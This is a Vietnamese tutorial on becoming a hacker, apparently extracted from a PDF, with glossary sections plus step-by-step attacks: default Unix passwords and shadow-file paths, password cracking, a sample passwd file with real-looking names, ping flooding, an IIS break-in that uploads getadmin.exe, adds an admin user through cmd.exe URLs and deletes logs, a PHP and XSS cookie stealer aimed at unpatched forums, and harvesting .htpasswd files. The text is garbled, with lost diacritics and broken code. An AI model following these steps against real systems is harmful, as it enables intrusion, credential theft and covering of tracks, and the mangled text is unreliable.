tài liệu hacker

7/30/2019 Ti Liu Hacker

1/59

Nhng hiu bit c bn nht tr thnh Hacker - Phn 1

Nhiu bn Newbie c hi ti Hack l nh th no ? Lm sao hack ?Nhng cc bn qun mt mt iu l cc bn cn phI c kin thc mtcch tng qut , hiu cc thut ng m nhng ngi rnh v mng hay sdng . Ring ti th cha tht gii bao nhiu nhng qua nghin cu ti cng tng hp c mt s kin thc c bn , mun chia s cho tt c cc bn ,nhm cng cc bn hc hi .

Ti s khng chu trch nhim nu cc bn dng n quy ph ngikhc . Cc bn c th copy hoc post trong cc trang Web khc nhng hyin tin tc gi di bi , tn trng bi vit ny cng chnh l tn trng tiv cng sc ca ti , ng thi cng tn trng chnh bn thn cc bn .Trong ny ti cng c chn thm mt s cch hack , crack v v d cn bn ,

cc bn c th ng dng th v nghin cu c n hiu thm , ri khi btgp mt t m cc bn khng hiu th hy c bi ny bit , trong ny tic s dng mt s ca bi vit m ti thy rt hay t trang Web ca HVA ,v cc trang Web khc m ti tng gh thm . Xin cm n nhng tc gi vit nhng bi y . By gi l vn chnh .1 . ) Ta cn nhng g bt u?

C th nhiu bn khng ng vi ti nhng cch tt nht thc tp l ccbn hy dng HH Window 9X , rI n cc ci khc mnh hn l Linux

hoc Unix , dI y l nhng ci bn cn c :+ Mt ci OS ( c th l DOS , Window 9X , Linux , Unit .)+ Mt ci trang Web tt ( HVA chng hn hi`hi` greenbiggrin.gifgreenbiggrin.gif )+ Mt b trnh duyt mng tt ( l Nescape , IE , nhng tt nht c l lGozzila )+ Mt cng c chat tt ( mIRC ,Yahoo Mass ..)+ Telnet ( hoc nhng ci tng t nh nmap )+ Ci quan trng nht m bt c ai mun tr thnh mt hacker l u phIc mt cht kin thc v lp trnh ( C , C++ , Visual Basic , Pert ..)

2 . ) Th no l mt a ch IP ?

_ a ch IP c chia thnh 4 s gii hn t 0 - 255. Mi s c lu bi 1byte - > !P c kicks thc l 4byte, c chia thnh cc lp a ch. C 3 lpl A, B, v C. Nu lp A, ta s c th c 16 triu i ch, lp B c 65536a ch. V d: lp B vi 132.25,chng ta c tt c cc a ch t


2/59


3/59

tin c nhn!( Ti liu ca HVA )

5 . ) Trojan / worm / virus / logicbomb l ci g ?

_ Trojan : Ni cho d hiu th y l chng trnh ip vin c ci vomy ca ngI khc n cp nhng ti liu trn my gI v cho chnhn ca n , Ci m n n cp c th l mt khu , accourt , hay cookie. tu theo mun ca ngI ci n .

_ virus : Ni cho d hiu th y l chng trnh vI nhng m c bit cci ( hoc ly lan t my khc ) ln my ca nn nhn v thc hin nhngyu cu ca m , a s virut c s dng ph hoI d liu hoc phhoI my tnh .

_ worm : y l chng trnh c lp c th t nhn bn bn thn n v ly

lan khp bn trong mng .Cng ging nh Virut , n cng c th ph hoId liu , hoc n c th ph hoI bn trong mng , nhiu khi cn lm downc mang .

_ logicbomb : L chng trnh gi mt lc nhiu gi d liu cho cng mta ch , lm ngp lt h thng , tt nghn ng truyn ( trn server ) hocdng lm cng c khng b I phng ( bom Mail ) .

6 . ) PGP l g ?

_ PGP l vit tt ca t Pretty Good Privacy , y l cng c s dng sm ho cha kho cng cng bo v nhng h s Email v d liu , ldng m ho an ton cao s dng phn mm cho MS_DOS , Unix ,VAX/VMS v cho nhng dng khc .

7 . ) Proxy l g ?

_Proxy cung cp cho ngi s dng truy xut internet vi nhng host n.Nhng proxy server phc v nhng nghi thc t bit hoc mt tp nhngnghi thc thc thi trn dual_homed host hoc basion host. Nhng chng

trnh client ca ngi s dung s qua trung gian proxy server thay th choserver tht s m ngi s dng cn giao tip. Proxy server xc nh nhngyu cu t client v quyt nh p ng hay khng p ng, nu yu cuc p ng, proxy server s kt ni vi server tht thay cho client v tiptc chuyn tip n nhng yu cu t clientn server, cng nh p ngnhng yu cu ca server n client. V vy proxy server ging cu nitrung gian gia server v client .


4/59

_ Proxy cho user truy xut dch v trn internet theo ngha trc tip. Vidual host homed cn phi login vo host trc khi s dng dch v no trninternet. iu ny thng khng tin li, v mt s ngi tr nn tht vngkhi h c cm gic thng qua firewall, vi proxy n gii quyt c vn ny. Tt nhin n cn c nhng giao thc mi nhng ni chung n cng khtin li cho user. Bi v proxy cho php user truy xut nhng dch v trninternet t h thng c nhn ca h, v vy n khng cho php packet i trctip gia h thng s dng v internet. ng i l ging tip thng qua dualhomed host hoc thng qua s kt hp gia bastion host v screeningrounter.

( Bi vit ca Z3RON3 ti liu ca HVA )

8 . ) Unix l g ?

_ Unix l mt h iu hnh ( ging Window ) .N hin l h iu hnh mnhnht , v thn thit vi cc Hacker nht . Nu bn tr thnh mt hackertht s th HH ny khng th thiu i vI bn . N c s dng h trcho lp trnh ngn ng C .

9 . ) Telnet l g ?

_ Telnet l mt chng trnh cho php ta kt nI n my khc thng qua

cng ( port ) . MI my tnh hoc my ch ( server ) u c cng , sau y lmt s cng thng dng :+ Port 21: FTP+ Port 23: Telnet+ Port 25: SMTP (Mail)+ Port 37: Time+ Port 43: Whois

_ V d : bn c th gI Telnet kt nI n mail.virgin.net trn port 25 .

10 . ) Lm th no bit mnh Telnet n h thng Unix ?

_ Ok , ti s ni cho bn bit lm sao mt h thng Unix c th cho hI bnkhi bn kt ni ti n . u tin , khi bn gi Unix , thng thng n s xuthin mt du nhc : Log in : , ( tuy nhin , ch vi nh vy th cng chachc chn y l Unix c ngoI tr chng xut hin thng bo trc ch log in : nh v d : Welcome to SHUnix. Please log in .)By gi ta ang tI du nhc log in , bn cn phI nhp vo mt accounthp l . Mt account thng thng gm c 8 c tnh hoc hn , sau khi bn


5/59

nhp account vo , bn s thy c mt mt khu , bn hy th nhp DefaultPassword th theo bng sau :

Account-------------------------Default Password

Root----------------------------------------------- RootSys------------------------------------------------ Sys / System / BinBin------------------------------------------------ -Sys / BinMountfsy------------------------------------------M ountfsys

Nuuc----------------------------------------------- AnonAnon----------------------------------------------- AnonUser----------------------------------------------- -UserGames---------------------------------------------G ames

Install-------------------------------------------- --InstallDemo----------------------------------------------- DemoGuest---------------------------------------------- Guest

11 . ) shell account l ci g ?

_ Mt shell account cho php bn s dng my tnh nh bn nh thit bu cuI ( terminal ) m vI n bn c th nh lnh n mt my tnh ang

chy Unix , Shell l chng trnh c nhim v dch nhng k t ca bngi n rI a vo thc hin lnh ca chng trnh Unix . VI mt shellaccount chnh xc bn c th s dng c mt trm lm vic mnh hnnhiu so vI ci m bn c th tng tng n c .Bn c th ly c shell account min ph tI trang Webwww.freeshell.com tuy nhin bn s khng s dng c telnet cho nkhi bn tr tin cho n .

12 . ) Lm cch no bn c th crack Unix account passwords ?

_ Rt n gin , tuy nhin cch m ti ni vI cc bn y lc hu rI ,cc bn c th crack c chng nu cc bn may mn , cn khng th cc

bn c tham kho ._ u tin bn hy ng nhp vo h thng c s dng Unix nh mt khchhng hoc mt ngI khch gh thm , nu may mn bn s ly c mtkhu c ct du trong nhng h thng chun nh :
http://www.freeshell.com/http://www.freeshell.com/


6/59

/etc/passwd

mi hng trong mt h s passwd c mt ti khon khc nhau , n gingnh hng ny :

userid assword:userid#:groupid#:GECOS field:home dir:shell

trong :+ userid = the user id name : tn ng nhp : c th l mt tn hoc mt s .+ password : mt m . Dng lm g hn cc bn cng bit rI .+ userid# : l mt s duy nht c thng bo cho ngI ng k khi hng k mI ln u tin .+ groupid# : tng t nh userid# , nhng n c dng cho nhng ngIang trong nhm no ( nh nhm Hunter Buq ca HVA chng hn )

+ GECOS FIELD : y l ni cha thng tin cho ngI s dng , trong c h tn y , s in thoi , a ch v.v. . y cng l ngun tt tad dng crack mt mt khu .+ home dir : l th mc ghi lI hot ng ca ngi khch khi h gh thm (ging nh mc History trong IE vy )+ Shell : y l tn ca shell m n t ng bt u khi ta login .

_ Hy ly file password , ly file text m ho v , sau bn dngchng trnh ``CrackerJack`` hoc ``John the Ripper`` crack .

_ Cc bn thy cng kh d phI khng ? Sai bt , khng d dng v may

mn bn c th crack c v hu ht by gi h ct rt k , hy c tipbn s thy kh khn ch no .

13 . ) shadowed password l ci g ?

_ Mt shadowed password c bit n l trong file Unix passwd , khi bnnhp mt mt khu , th ngI khc ch thy c trnh n ca n ( nh khiu X hoc * ) . Ci ny thng bo cho bn bit l file passwd c ct gi ni khc , ni m mt ngI s dng bnh thng khng thn c . Khng l ta nh b tay , d nhin l I vI mt hacker th

khng ri , ta khng n c trc tip file shadowed password th ta hytm file sao lu ca n , l file Unshadowed .

Nhng file ny trn h thng ca Unix khng c nh , bn hy th vI lnlt nhng ng dn sau :

CODEAIX 3 /etc/security/passwd !


7/59

or /tcb/auth/files/ /A/UX 3.0s /tcb/files/auth/?/ *BSD4.3-Reno /etc/master.passwd *ConvexOS 10 /etc/shadpw *ConvexOS 11 /etc/shadow *DG/UX /etc/tcb/aa/user/ *EP/IX /etc/shadow xHP-UX /.secure/etc/passwd *IRIX 5 /etc/shadow xLinux 1.1 /etc/shadow *OSF/1 /etc/passwd[.dir|.pag] *SCO Unix #.2.x /tcb/auth/files/ /SunOS4.1+c2 /etc/security/passwd.adjunct =##usernameSunOS 5.0 /etc/shadow

maps/tables/whatever >System V Release 4.0 /etc/shadow xSystem V Release 4.2 /etc/security/* databaseUltrix 4 /etc/auth[.dir|.pag] *UNICOS /etc/udb =20

Trc du / u tin ca mt hng l tn ca h thng tng ng , hycn c vo h thng tht s bn mun ly rI ln theo ng dn pha sau

du /u tin .V cuI cng l nhng account passwd m ti tng crack c , c th bygi n ht hiu lc rI :

CODEarif:x:1569:1000:Nguyen Anh Chau:/udd/arif:/bin/ksharigo:x:1570:1000:Ryan Randolph:/udd/arigo:/bin/ksharisto:x:1573:1000:To Minh Phuong:/udd/aristo:/bin/ksharmando:x:1577:1000:Armando Huis:/udd/armando:/bin/ksharn:x:1582:1000:Arn mett:/udd/arn:/bin/ksh

arne:x:1583:1000:Pham Quoc Tuan:/udd/arne:/bin/ksharoon:x:1585:1000:Aroon Thakral:/udd/aroon:/bin/ksharozine:x:1586:1000: Mogielnicki:/udd/arozine:/bin/basharranw:x:1588:1000:Arran Whitaker:/udd/arranw:/bin/ksh

bo m s b mt nn pass ca h ti xo i v vo l k hiu x


8/59

, cc bn hy tm hiu thng tin c c t chng xem

Ht phn 1Nhng hiu bit c bn nht tr thnh Hacker - Phn 2

Vitual port ( cng o ) l 1 s t nhin c gi trong TCP(TranmissionControl Protocol) v UDP(User Diagram Protocol) header. Nh mi ngui bit, Windows c th chy nhiu chng trnh 1 lc, mi chng trnhny c 1 cng ring dng truyn v nhn d liu.

V d 1 my c a ch IP l 127.0.0.1 chy WebServer, FTP_Server, POP3server, etc, nhng dch v ny u uc chy trn 1 IP address l 127.0.0.1,khi mt gi tin uc gi n lm th no my tnh ca chng ta phn bitc gi tin ny i vo dch v no WebServer hay FTP server hay SM!

TP? Chnh v th Port xut hin. Mi dch v c 1 s port mc nh, v dFTP c port mc nh l 21, web service c port mc nh l 80, POP3 l110, SMTP l 25 vn vn.... Ngi qun tr mng c th thay i s portmc nh ny, nu bn ko bit s port trn mt my ch, bn ko th kt nivo dch v c. Chc bn tng nghe ni n PORT MAPPINGnhng c l cha bit n l g v chc nng th no. Port mapping thc ran gin ch l qu trnh chuyn i s port mc nh ca mt dch v no n 1 s khc. V d Port mc nh ca WebServer l 80, nhng thnhthong c l bn vn thy http://www.xxx.com:8080 , 8080 y chnh l

s port ca host xxx nhng uc ngui qun tr ca host ny ``map`` t80 thnh 8080.

( Ti liu ca HVA )

15 . ) DNS l g ?

_ DNS l vit tt ca Domain Name System. Mt my ch DNS i kt ni cng s 53, c ngha l nu bn mun kt ni vo my ch , bn phikt ni n cng s 53. My ch chy DNS chuyn hostname bng cc ch

ci thnh cc ch s tng ng v ngc li. V d: 127.0.0.1 -- > localhostv localhost--- > 127.0.0.1 .

( Ti liu ca HVA )

16 . ) i iu v Wingate :
http://www.xxx.com:8080/http://www.xxx.com:8080/


9/59

_ WinGate l mt chng trnh n gin cho php bn chia cc kt ni ra.Th d: bn c th chia s 1 modem vi 2 hoc nhiu my . WinGate dngvi nhiu proxy khc nhau c th che giu bn .

_ Lm sao Wingate c th che du bn ? Hy lm theo ti : Bn hytelnet trn cng 23 trn my ch chy WinGate telnet proxy v bn s c dunhc WinGate > . Ti du nhc ny bn nh vo tn server, cng mtkhong trng v cng bn mun kt ni vo. VD :

CODEtelnet wingate.netWinGate > victim.com 23

ta telnet n cng 23 v y l cng mc nh khi bn ci Wingate . lc ny

IP trn my m victim chp c ca ta l IP ca my ch cha Wingateproxy ._ Lm sao tm Wingate ?+ Nu bn mun tm IP WinGates tnh (IP khng i) th n yahoo hay mttrang tm kim cable modem. Tm kim cable modems v nhiu ngi dngcable modems c WinGate h c th chia s ng truyn rng ca ncable modems cho nhng my khc trong cng mt nh . Hoc bn c thdng Port hay Domain scanners v scan Port 1080 .+ tm IP ng (IP thay i mi ln user kt ni vo internet) ca

WinGates bn c th dng Domscan hoc cc chng trnh qut khc . Nudng Domscan bn hy nhp khong IP bt k vo box u tin v s 23 vobox th 2 . Khi c kt qu , bn hy th ln lt telnet n cc a ch IPtm c ( hng dn trn ), nu n xut hin du Wingate > th bn tm ng my ang s dng Wingate rI .+ Theo kinh nghim ca ti th bn hy down wingatescanner v m si , nc rt nhiu trn mng .

17 . ) i iu v Traceroute :

_ Traceroute l mt chng trnh cho php bn xc nh c ng i cacc gi packets t my bn n h thng ch trn mng Internet.

_ bn hy xem VD sau :

CODEC:\windows > tracert 203.94.12.54


10/59

Tracing route to 203.94.12.54 over a maximum of 30 hops

1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms3 232.61.41.10 (232.61.41.251) 9 ms 11 ms 13 ms4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms6 196.23.0.25 (196.23.0.25) 1195 ms1204 ms7 backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms8 asianet.com (202.12.32.10) 1210 ms1239 ms1211 ms9 south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms10 backbone.vsnl.net.in (203.98.46.01) 1064 ms1109 ms1061 ms11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms1146 ms1203ms

12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159 ms1073 ms13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms

Ti cn bit ng i t my ti n mt host trn mng Internet c a chip l 203.94.12.54. Ti cn phi tracert n n! Nh bn thy trn, cc gi

packets t my ti mun n c 203.94.12.54 phi i qua 13 hops(mcxch) trn mng. y l ng i ca cc gi packets .

_ Bn hy xem VD tip theo :

CODEhost2 # traceroute xyz.com

traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets1 isp.net (202.xy.34.12) 20ms 10ms 10ms2 xyz.com (202.xx.12.34) 130ms 130ms 130ms

+ Dng u tin cho bit hostname v a ch IP ca h thng ch. Dng

ny cn cho chng ta bit thm gi tr TTL


11/59

+ Dng th 3, xyz.com(202.xx.12.34) nhn c datagram c TTL=1(routerth nht gim mt trc - TTL=2-1=1). Tuy nhin, xyz.com khng

phi l mt router, n s gi tr li cho traceroute mt ICMP error message``Port Unreachable``. Khi nhn c ICMP message ny, traceroute s bitc n c h thng ch xyz.com v kt thc nhim v ti y.+ Trong trng hp router khng tr li sau 5 giy, traceroute s in ra mtdu sao ``*``(khng bit) v tip tc gi datagram khc n host ch!

_Ch :Trong windows: tracert hostnameTrong unix: traceroute hostname

( Ti liu ca viethacker.net )

18 . ) Ping v cch s dng :

_ Ping l 1 khi nim rt n gin tuy nhin rt hu ch cho vic chn onmng. Tiu s ca t ``ping`` nh sau: Ping l ting ng vang ra khi 1 tungm mun bit c 1 vt th khc gn mnh hay ko, nu c 1 vt th no gn tu ngm ting sng m ny s va vo vt th v ting vang li sl ``pong`` vy th tu ngm s bit l c g gn mnh.

_Trn Internet, khi nim Ping cng rt ging vi tiu s ca n nh cp trn. Lnh Ping gi mt gi ICMP (Internet Control MessageProtocol) n host, nu host ``pong`` li c ngha l host tn ti (hoc

l c th vi ti oc). Ping cng c th gip chng ta bit c lung thigian mt gi tin (data packet) i t my tnh ca mnh n 1 host no ._Ping tht d dng, ch cn m MS-DOS, v g ``ping a_ch_ip``, mcnh s ping 4 ln, nhng bn cng c th g

CODE``ping ip.address -t``

Cch ny s lm my ping mi. thay i kch thc ping lm nh sau:

CODE``ping -l (size) a_ch_ip ``

Ci ping lm l gi mt gi tin n mt my tnh, sau xem xem mt baolu gi tin ri xem xem sau bao lu gi tin quay tr li, cch ny xc nh


12/59

c tc ca kt ni, v thi gian cn mt gi tin i v quay tr li vchia bn (gi l ``trip time``). Ping cng c th c dng lm chm ihoc v h thng bng lt ping. Windows 98 treo sau mt pht lt ping(B m ca kt ni b trn c qua nhiu kt ni, nn Windows quyt nhcho n i ngh mt cht). Mt cuc tn cng ping flood s chim rt nhiu

bng thng ca bn, v bn phi c bng thng ln hn i phng ( tr khii phng l mt my chy Windows 98 v bn c mt modem trung bnh,

bng cch bn s h gc i phng sau xp x mt pht lt ping). LtPing khng hiu qu lm i vi nhng i phng mnh hn mt cht. trkhi bn c nhiu ng v bn kim sot mt s lng tng i cc mych cng ping m tng bng thng ln hn i phng.Ch : option t ca DOS khng gy ra lt ping, n ch ping mc tiu mtcch lin tc, vi nhng khong ngt qung gia hai ln ping lin tip.Trong tt c cc h Unix hoc Linux, bn c th dng ping -f gy ra lt

thc s. Thc t l phi ping -f nu bn dng mt bn tng thch POSIX(POSIX - Portable Operating System Interface da trn uniX), nu khng ns khng phi l mt bn Unix/Linux thc s, bi vy nu bn dng mt hiu hnh m n t cho n l Unix hay Linux, n s c tham s -f.

( Ti liu ca HVA v viethacker.net )

19 . ) K thut xm nhp Window NT t mng Internet :

_ y l bi hc hack u tin m ti thc hnh khi bt u nghin cu vhack , by gi ti s by li cho cc bn . bn s cn phI c mt s thIgian thc hin c n v n tuy d nhng kh . Ta s bt u :

_ u tin bn cn tm mt server chy IIS :_ Tip n bn vo DOS v nh ` FTP . VD :

c:\Ftp www.dodgyinc.com

( trang na khi ti thc hnh th vn cn lm c , by gi khng bit h fix cha , nu bn no c trang no khc th hy post ln cho mI ngI

cng lm nh )Nu connect thnh cng , bn s thy mt s dng tng t nh th ny :

CODEConnected to www.dodgyinc.com.220 Vdodgy Microsoft FTP Service (Version 3.0).User (www.dodgyinc.com none)):
http://www.dodgyinc.com/http://www.dodgyinc.com./http://www.dodgyinc.com/http://www.dodgyinc.com./


13/59

Ci m ta thy trn c cha nhng thng tin rt quan trng , n cho ta bittn Netbios ca my tnh l Vdodgy . T iu ny bn c th suy din ratn m c s dng cho NT cho php ta c th khai thc , mc nh mdch v FTP gn cho n nu n cha i tn s l IUSR_VDODGY . Hynh ly v n s c ch cho ta . Nhp ``anonymous trong user n s xuthin dng sau :

CODE331 Anonymous access allowed, send identity (e-mail name) as password.Password:

By gi passwd s l bt c g m ta cha bit , tuy nhin , bn hy th nhvo passwd l anonymous . Nu n sai , bn hy log in lI thit b FTP ,

bn hy nh l khi ta quay lI ln ny th khng s dng cch mo danh na( anonymous ) m s dng `Guest , th li passwd vi guest xem thno .By gi bn hy nh lnh trong DOS :

CODECd /c

V s nhn thy kt qu nu nh bn xm nhp thnh cng , by gi bnhy nhanh chng tm th mc `cgi-bin` . Nu nh bn may mn , bn s tmc d dng v thng thng h thng qun l t `cgi-bin` vo ni mta va xm nhp cho cc ngI qun l h d dng iu khin mng hn .th mc cgi-bin c th cha cc chng trnh m bn c th li dng n chy t trnh duyt Web ca bn . Ta hy bt u quy nogreenbiggrin.gif greenbiggrin.gif .

_ u tin , bn hy chuyn t th mc cgi-bin v s dng lnh Binary

( c th cc bn khng cn dng lnh ny ) , sau bn dnh tip lnh putcmd.exe . Tip theo l bn cn c file hack ci vo th mc ny , hytm trn mng ly 2 file quan trng nht l `getadmin.exe` v`gasys.dll` . Download chng xung , mt khi bn c n hy ci votrong th mc cgi-bin . Ok , coi nh mI vic xong , bn hy ng ca sDOS .By gi bn hy nh a ch sau ln trnh duyt ca bn :


14/59

http://www.dodgyinc.com/cgi-bin/ge tadmin.exe?IUSR_VDODGY

Sau vi giy bn s c c cu tr li nh dI y :

CODECGI ErrorThe specified CGI application misbehaved by not returning a complete setof HTTP headers. The headers it did return are:Congratulations , now account IUSR_VDODGY have administrator rights!

Th l bn mo danh admin xm nhp h thng , vic cn thit by gil bn hy t to cho mnh mt account , hy nh dng sau trn IE :

http://www.dodgyinc.com/cgi- bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%2 0hacker%20toilahacker%20/add

dng lnh trn s to cho bn mt account login vi user : anhdenday vpasswd : toilahackerBy gi bn hy l cho user ny c account ca admin ,bn ch cn nh ln IE lnh :

http://www.dodgyinc.com/cgi-bin/ge tadmin.exe?anhdenday

Vy l xong ri , bn hy disconnect v n start menu - > find ri searchcomputer `www.dodgyinc.com`. Khi tm thy , bn vo explore , explore NTs m ra bn hay nhp user v passwd m n ( ca ti l user : anhdendayv passwd : toilahacker ) .

C mt vn l khi bn xm nhp h thng ny th s b ghi li , do xo du vt bn hy vo `Winnt\system32\logfiles` m file log rI xonhng thng tin lin quan n bn , rI save chng . Nu bn mun ly mtthng bo g v vic chia s s xm nhp th bn hy thay i ngy thng

trn my tnh vI URL sau :

http://www.dodgyinc.com/cgi-bin/cm d.exe?/c%20date%2030/04/03

xong rI bn hy xo file `getadmin.exe`, v `gasys.dll` t `cgi-bin` . Mcch khi ta xm nhp h thng ny l chm pass ca admin ln sau xmnhp mt cch hp l , do bn hy tm file SAM ( cha pass ca admin
http://www.dodgyinc.com/cgi-bin/getadmin.exe?%20IUSR_VDODGYhttp://www.dodgyinc.com/cgi-http://www.dodgyinc.com/cgi-bin/getadmin.exe?%20anhdendayhttp://www.dodgyinc.com/cgi-bin/cmd.exe?/c%20%20date%2030/04/03http://www.dodgyinc.com/cgi-bin/getadmin.exe?%20IUSR_VDODGYhttp://www.dodgyinc.com/cgi-http://www.dodgyinc.com/cgi-bin/getadmin.exe?%20anhdendayhttp://www.dodgyinc.com/cgi-bin/cmd.exe?/c%20%20date%2030/04/03


15/59

v member ) trong h thng rI dng chng trnh l0pht crack crackpass ( Hng dn v cch s dng l0pht crack v 3.02 ti post ln ri,cc bn hy t nghin cu nh ) . y l link : http://vnhacker.org/forum/?act=ST& f=6&t=11566&s=Khi crack xong cc bn c user v pass ca admin rI , by gi hy xoaccount ca user ( ca ti l anhdenday ) i cho an ton . Bn c thlm g trong h thng l tu thch , nhng cc bn ng xo ht ti liu cah nh , ti cho h lm .Bn cm thy th no , rc ri lm phi khng . Lc ti th hack cch ny ,ti my m mt c 4 gi , nu nh bn quen th ln th 2 bn s mt tthI gian hn .

phn 3 ti s cp n HH Linux , n cch ngt mt khu bo v camt Web site , v lm th no hack mt trang web n gin nht .v.v

Ht phn 2Nhng hiu bit c bn nht tr thnh Hacker - Phn 3

20.) Cookie l g ?

Cookie l nhng phn d liu nh c cu trc c chia s gia web site v

browser ca ngi dng. cookies c lu tr di nhng file d liu nhdng text (size di 4k). Chng c cc site to ra lu tr/truy tm/nhnbit cc thng tin v ngi dng gh thm site v nhng vng m h iqua trong site.

Nhng thng tin ny c th bao gm tn/nh danh ngi dng, mt khu,s thch, thi quen...Cookie c browser ca ngi dng chp nhn lutrn a cng ca my mnh, ko phi browser no cng h tr cookie. Saumt ln truy cp vo site, nhng thng tin v ngi dng c lu tr trongcookie. nhng ln truy cp sau n site , web site c th dng li nhng

thng tin trong cookie (nh thng tin lin quan n vic ng nhp vo 1forum...) m ngi ko phi lm li thao tc ng nhp hay phi nhp li ccthng tin khc. Vn t ra l c nhiu site qun l vic dng li cc thngtin lu trong cookie ko chnh xc, kim tra ko y hoc m ho cc thngtin trong cookie cn s h gip cho hacker khai thc vt qua cnh cang nhp, ot quyn iu khin site .
http://vnhacker.org/forum/?act=ST&f=6&t=11566%20&s=http://vnhacker.org/forum/?act=ST&f=6&t=11566%20&s=http://vnhacker.org/forum/?act=ST&f=6&t=11566%20&s=http://vnhacker.org/forum/?act=ST&f=6&t=11566%20&s=


16/59

_ Cookies thng c cc thnh phn sau :

+ Tn: do ngi lp trnh web site chn+ Domain: l tn min t server m cookie c to v gi i+ ng dn: thng tin v ng dn web site m bn ang xem+ Ngy ht hn: l thi im m cookie ht hiu lc .+ Bo mt: Nu gi tr ny c thit lp bn trong cookie, thng tin s cm ho trong qu trnh truyn gia server v browser.+ Cc gi tr khc: l nhng d liu c trng c web server lu tr nhn dng v sau cc gi tr ny ko cha cc khong trng, du chm, phyv b gii hn trong khong 4k.

( Ti liu ca Viethacker.net )

21 . ) K thut ly cp cookie ca nn nhn :

_ Trc ht , cc bn hy m notepad ri chp on m sau vo notepad :

CODE


17/59

}}return $res;}// get current date$now = date(``Y-m-d H:i:s``);// init$myData = ``[-----$now-----]`` . LINE;// get$myData .= getvars($HTTP_GET_VARS, ```);// file$file = $REMOTE_ADDR . ``.txt``;$mode = ``r+``;if (!file_exists($file))

$mode = ``w+``;$fp = fopen ($file, $mode);fseek($fp, 0, SEEK_END);fwrite($fp, $myData);fclose($fp);? >

hoc

CODE


18/59

(Bn hy sa ci [email protected] thnh a ch Mail ca bn ) .

Bn hy save ci notepad ny vi tn < tn tu cc bn > .php ( Nh lphi c .php ) ri upload ln mt host no c h tr PHP , trong VD cati l abc.php .( i vi cc bn tng lm Web chc s rt d phIkhng ? ) . on m ny s c nhim v n cp thng tin (v c khi c ccookie ) ca nn nhn khi h m d liu c cha on m ny rI t ngsave thng tin thnh file < ip ca nn nhn > .txt .

_ Cn mt cch na ly cookie c s dng trn cc forum b li nhngcha fix , khi post bi bn chi cn thm on m sau vo bi ca mnh :

CODE

document.write(` `)

vi host_php : l a ch bn upload file n cp cookie ln .v abc.php l file VD ca ti .

_ V d : khi p dng trong tag img, ta dng nh sau:

CODE[img]http://www.quantrimang.com/%22javascript:[/img] `)\">

hoc:

[CODEimg]javascript: Document.write(``)\">

_ Bn c th tm nhng trang web thc hnh th cch trong VD ny bngcch vo google.com tm nhng forum b li ny bng t kho ``Powered by

.. forum vi nhng forum sau : ikonboard, Ultimate Bulletin Board ,vBulletin Board, Snitz . Nu cc bn may mn cc bn c th tm thynhng forum cha fix li ny m thc hnh , ai tm c th chia s vi mingi nh .

_ Cn nhiu on m n cp cookie cng hay lm , cc bn hy t mnh tmthm .
mailto:[email protected]:[email protected]


19/59

22 . ) Cch ngt mt khu bo v Website :

_ Khi cc bn ti tm kim thng tin trn mt trang Web no , c mt sch trn trang Web khi bn vo s b chn li v s xut hin mt box yucu nhp mt khu , y chnh l khu vc ring t ct du nhng thng tinmt ch dnh cho s ngi hoc mt nhm ngi no ( Ni ct nghhack ca viethacker.net m bo e-chip ni ti chng hn ) . Khi ta clickvo ci link th ( thng thng ) n s gi ti .htpasswd v .htaccess nm cng trong th mc bo v trang Web . Ti sao phi dng du chm trc trong tn file `.htaccess`? Cc file c tn bt u l mt du chm `.` sc cc web servers xem nh l cc file cu hnh. Cc file ny s b n i(hidden) khi bn xem qua th mc c bo v bng file .htaccess .Haih s ny c nhim v iu khin s truy nhp ti ci link an ton m bnmun xm nhp . Mt ci qun l mt khu v user name , mt ci qun

l cng vic m ho nhng thng tin cho file kia . Khi bn nhp ng c 2th ci link mi m ra . Bn hy nhn VD sau :

CODEGraham:F#.DG*m38d%RFWebmaster:GJA54j.3g9#$@f

Username bn c th c c ri , cn ci pass bn nhn c hiu m t g

khng ? D nhin l khng ri . bn c hiu v sao khng m bn khng thc c chng khng ? ci ny n c s can thip ca thng file .htaccess .Do khi cng trong cng th mc chng c tc ng qua li bo v lnnhau nn chng ta cng khng di g m c gng t nhp ri crack m mtkhu cht tit ( khi cha c ngh crack mt khu trong tay . Ti cngang nghin cu c th xm nhp trc tip , nu thnh cng ti s postln cho cc bn ) . Li l y , chuyn g s xy ra nu ci .htpasswd nmngoi th mc bo v c file .htaccess ? Ta s chm c n d dng , bnhy xem link VD sau :

http://www.company.com/cgi-bin/pro tected/

hy kim tra xem file .htpasswd c c bo v bI .htaccess hay khng , tanhp URL sau :

http://www.company.com/cgi-bin/pro tected/.htpasswd
http://www.company.com/cgi-bin/protected/http://www.company.com/cgi-bin/protected/.htp%20asswdhttp://www.company.com/cgi-bin/protected/http://www.company.com/cgi-bin/protected/.htp%20asswd


20/59

Nu bn thy c cu tr lI `File not found` hoc tng t th chc chn fileny khng c bo v , bn hy tm ra n bng mt trong cc URL sau :

http://www.company.com/.htpasswdhttp://www.company.com/cgi-bin/.ht passwdhttp://www.company.com/cgi-bin/pas swords/.htpasswdhttp://www.company.com/cgi-bin/pas swd/.htpasswd

nu vn khng thy th cc bn hy c tm bng cc URL khc tng t ( cth n nm ngay th mc gc y ) , cho n khi no cc bn tm thy ththi nh .Khi tm thy file ny ri , bn hy dng chng trnh ``John the ripper``hoc ``Crackerjack``, crack passwd ct trong . Cng vic tip theo hn

cc bn bit l mnh phi lm g rI , ly user name v passwd hp l tnhp vo ri xem th my c cu tm s nhng g trong , nhng cc

bn cng ng c i pass ca h hay quy h nh .Cch ny cc bn cng c th p dng ly pass ca admin v hu htnhng thnh vin trong nhm kn u l c chc c quyn c .

23 . ) Tm hiu v CGI ?

_ CGI l t vit tt ca Common Gateway Interface , a s cc Website u

